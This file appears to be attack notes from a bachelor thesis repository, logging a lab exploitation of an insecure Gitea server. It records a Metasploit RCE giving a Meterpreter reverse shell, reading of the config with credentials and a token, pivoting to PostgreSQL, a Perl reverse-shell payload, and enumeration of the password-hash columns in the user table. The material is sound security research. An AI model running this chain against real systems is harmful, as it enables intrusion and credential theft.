nanopenguin/bachelor-thesis
Archived
1
0
Fork 0
Code Actions
This repository has been archived on 2025-09-29. You can view files and clone it, but cannot push or open issues or pull requests.
bachelor-thesis/attack_notes_insecure.md
Benedikt Galbavy a14b7dc0df asdfgh
2025-05-20 00:43:52 +02:00

8.6 KiB
Raw Permalink Blame History

manually create account in gitea (demo_user:demo_user)

assuming ALLOW_LOCALNETWORKS is enabled (scenario: same network originally had a different git server, thus migration is now desired)

msf6 > use exploit/multi/http/gitea_git_fetch_rce 
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_fetch_rce) > set LHOST 192.168.56.20
LHOST => 192.168.56.20
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS 192.168.56.10
RHOSTS => 192.168.56.10
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 3000
RPORT => 3000
msf6 exploit(multi/http/gitea_git_fetch_rce) > set SSL false
SSL => false
msf6 exploit(multi/http/gitea_git_fetch_rce) > set username demo_user
username => demo_user
msf6 exploit(multi/http/gitea_git_fetch_rce) > set password demo_user
password => demo_user
msf6 exploit(multi/http/gitea_git_fetch_rce) > run
[*] Started reverse TCP handler on 192.168.56.20:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: 1.16.6
[*] Using URL: http://192.168.56.20:8080/
[*] Using URL: http://192.168.56.20:8080/6usOy2
[*] Client 192.168.56.10 (curl/7.79.1) requested /6usOy2
[*] Sending payload to 192.168.56.10 (curl/7.79.1)
[*] Sending stage (3045380 bytes) to 192.168.56.10
[*] Meterpreter session 1 opened (192.168.56.20:4444 -> 192.168.56.10:48350) at 2025-05-19 07:35:34 -0400
[*] Command Stager progress - 100.00% done (112/112 bytes)

meterpreter > sysinfo
Computer     : 172.18.0.2
OS           :  (Linux 5.15.0-135-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

shell commands have been prefixed with a > for readability, this symbol is not present in the original

meterpreter > shell
Process 172 created.
Channel 1 created.
> env
USER=git
SHLVL=1
HOME=/data/git
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
LANG=C
PWD=/data/git/repositories/demo_user/wssbr3glpme5a.git
> ls /data
git
gitea
ssh
> ls /data/gitea
attachments
avatars
conf
indexers
jwt
log
queues
repo-archive
repo-avatars
> ls /data/gitea/conf
app.ini
> cat /data/gitea/conf/app.ini
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod

[repository]
ROOT = /data/git/repositories

[repository.local]
LOCAL_COPY_PATH = /data/gitea/tmp/local-repo

[repository.upload]
TEMP_PATH = /data/gitea/uploads

[server]
APP_DATA_PATH    = /data/gitea
DOMAIN           = localhost
SSH_DOMAIN       = localhost
HTTP_PORT        = 3000
ROOT_URL         = https://gitea.vm.local/
DISABLE_SSH      = false
SSH_PORT         = 22
SSH_LISTEN_PORT  = 22
LFS_START_SERVER = false
LFS_CONTENT_PATH = /data/git/lfs

[database]
PATH    = /data/gitea/gitea.db
DB_TYPE = postgres
HOST    = postgres:5432
NAME    = gitea
USER    = gitea
PASSWD  = gitea
LOG_SQL = false

...

[log]
MODE      = console
LEVEL     = info
ROUTER    = console
ROOT_PATH = /data/gitea/log

[security]
INSTALL_LOCK                  = true
SECRET_KEY                    = 
REVERSE_PROXY_LIMIT           = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN                = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3NDc2NTQxMTB9.qXWoxugJwfYRPl1mm8pQ_Z1dreWr2A2I4Aol5edV8o4

[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW  = false

[migrations]
ALLOW_LOCALNETWORKS = true

for demonstration purposes,

database setup

meterpreter > resolve postgres

Host resolutions
================

    Hostname  IP Address
    --------  ----------
    postgres  172.18.0.1

meterpreter > portfwd add -l 5432 -p 5432 -r 172.18.0.1
[*] Forward TCP relay created: (local) :5432 -> (remote) 172.18.0.1:5432
meterpreter > background
[*] Backgrounding session 1...
msf6 > use auxiliary/scanner/postgres/postgres_login
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/postgres/postgres_login) > set USERNAME gitea
USERNAME => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set PASSWORD gitea
PASSWORD => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set DATABASE gitea
DATABASE => gitea
msf6 auxiliary(scanner/postgres/postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/postgres/postgres_login) > run
[!] No active DB -- Credential data will not be saved!
[+] 127.0.0.1:5432 - Login Successful: gitea:gitea@gitea
[*] PostgreSQL session 2 opened (127.0.0.1:45027 -> 127.0.0.1:5432) at 2025-05-19 07:55:46 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 1 credential was successful.
[*] 1 Postgres session was opened successfully.
[*] Auxiliary module execution completed

msf6 > use auxiliary/scanner/postgres/postgres_version 
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_version) > set SESSION 2
SESSION => 2
msf6 auxiliary(scanner/postgres/postgres_version) > run
[*] 127.0.0.1:5432 Postgres - Version PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit (Post-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf6 > use exploit/multi/postgres/postgres_copy_from_program_cmd_exec 
[*] Using configured payload cmd/unix/reverse_perl
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set SESSION 2
SESSION => 2
msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST 192.168.56.20
LHOST => 192.168.56.20msf6 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run
[*] Started reverse TCP handler on 192.168.56.20:4444 
[*] : - PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit
[*] Exploiting...
[+] 127.0.0.1:5432 - gqBG2W1VfJT dropped successfully
[+] 127.0.0.1:5432 - gqBG2W1VfJT created successfully
[!] 127.0.0.1:5432 - Unable to execute query: COPY "gqBG2W1VfJT" FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.56.20:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};''';
[-] Insufficient permissions, User must be superuser or in pg_read_server_files group
[-] Exploit Failed

most explots require superuser unfortunately, as shown

msf6 > use auxiliary/admin/postgres/postgres_sql
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(admin/postgres/postgres_sql) > set SESSION 2
SESSION => 2
msf6 auxiliary(admin/postgres/postgres_sql) > set SQL 'SELECT version();'
SQL => SELECT version();
msf6 auxiliary(admin/postgres/postgres_sql) > run
Query Text: 'SELECT version();'
===============================

    version
    -------
    PostgreSQL 9.6.24 on x86_64-pc-linux-gnu (Ubuntu 9.6.24-10.pgdg22.04+1), compiled by gcc (U
    buntu 11.4.0-1ubuntu1~22.04) 11.4.0, 64-bit

[*] Auxiliary module execution completed
msf6 auxiliary(admin/postgres/postgres_sql) > set SQL "SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';"
SQL => SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';
msf6 auxiliary(admin/postgres/postgres_sql) > run
Query Text: 'SELECT column_name, data_type FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'user';'
==================================================================================================================================

    column_name                     data_type
    -----------                     ---------
    allow_create_organization       boolean
    allow_git_hook                  boolean
    allow_import_local              boolean
    avatar                          character varying
    ...
    login_name                      character varying
    login_source                    bigint
    login_type                      integer
    ...
    passwd                          character varying
    passwd_hash_algo                character varying
    ...
    salt                            character varying
    ...

[*] Auxiliary module execution completed

log:insecure:nmap log:insecure:gitea_rce log:insecure:gitea:shell log:insecure:postgres_session log:insecure:postgres_exploit_version log:insecure:postgres_exploit_rce log:insecure:postgres_exploit_sql